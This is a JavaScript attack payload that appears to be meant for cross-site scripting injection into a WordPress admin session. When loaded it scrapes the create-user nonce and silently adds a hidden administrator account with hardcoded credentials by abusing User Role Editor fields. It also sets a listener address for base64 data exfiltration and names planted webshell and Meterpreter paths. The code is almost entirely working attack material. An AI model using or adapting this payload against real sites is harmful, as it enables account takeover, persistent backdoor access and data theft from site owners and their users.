// Web server listening for exfil data
// This will be as base64 data with a .js added, trying to 
// include a non-exist remote javascript file so you 
// get the base64 data in the 404 log
var httpExfilServer = "http://192.168.78.135:8888";


// This will hold the webshell locations
// Note that different wordpress servers
// will save these in different locations, 
// we don't control the directory name.
// The add plugin function will parse out 
// the correct directory name and update
// these variables as necessary. 
var webShellPath    = "shell/shell.php";
var phpMetShellPath = "shell/meterpreter.php";



const sleep = (milliseconds) => 
{
	return new Promise(resolve => setTimeout(resolve, milliseconds))
}



function read_body(xhr) 
{ 
	var data;

	if (!xhr.responseType || xhr.responseType === "text") 
	{
		data = xhr.responseText;
	} 
	else if (xhr.responseType === "document") 
	{
		data = xhr.responseXML;
	} 
	else if (xhr.responseType === "json") 
	{
		data = xhr.responseJSON;
	} 
	else 
	{
		data = xhr.response;
	}
	return data; 
}





function addAdminUser()
{
	var uri = "/wp-admin/user-new.php";

	// The following user will be added as an Administrator level user
	var username  = "novouser";
	var email     = "teste@teste.com"
	var firstName = "trevor";
	var lastName  = "roach";
	var password  = "PasswordStrongEnought";



	xhr = new XMLHttpRequest();

	xhr.open("GET", uri, true);
	xhr.send(null);


	xhr.onreadystatechange = function()
	{
		if (xhr.readyState == XMLHttpRequest.DONE)
		{
			var response = read_body(xhr);
			var noncePos = response.indexOf('name="_wpnonce_create-user" value="');
			var nonceVal = response.substring(noncePos+35, noncePos+45);

			xhr = new XMLHttpRequest();
			xhr.open("POST", uri);

 			xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
 			xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

			var body = "action=createuser&"
			body += "_wpnonce_create-user=" + nonceVal + "&"; 
			body += "_wp_http_referer=%2Fwp-admin%2Fuser-new.php&"
			body += "user_login=" + username + "&";
			body += "email=" + email + "&";
			body += "first_name=" + firstName + "&";
			body += "last_name=" + lastName + "&";
			body += "uri=&";
			body += "pass1=" + password + "&";
			body += "pass1-text=" + password + "&";
			body += "pass2=" + password + "&";
			body += "pw_weak=on&";
			body += "send_user_notification=0&";
			body += "role=subscriber&";
			body += "ure_select_other_roles=administrator&"; // muahahahaha 
			body += "ure_other_roles=administrator&"; // insert Dr. Evil second muahahahaha
			body += "createuser=Add+New+User";

			xhr.send(body);
            console.log("test inner")
		}
        console.log("text outer")
	}

    console.log("LOADED");
    alert("loaded");
}


addAdminUser();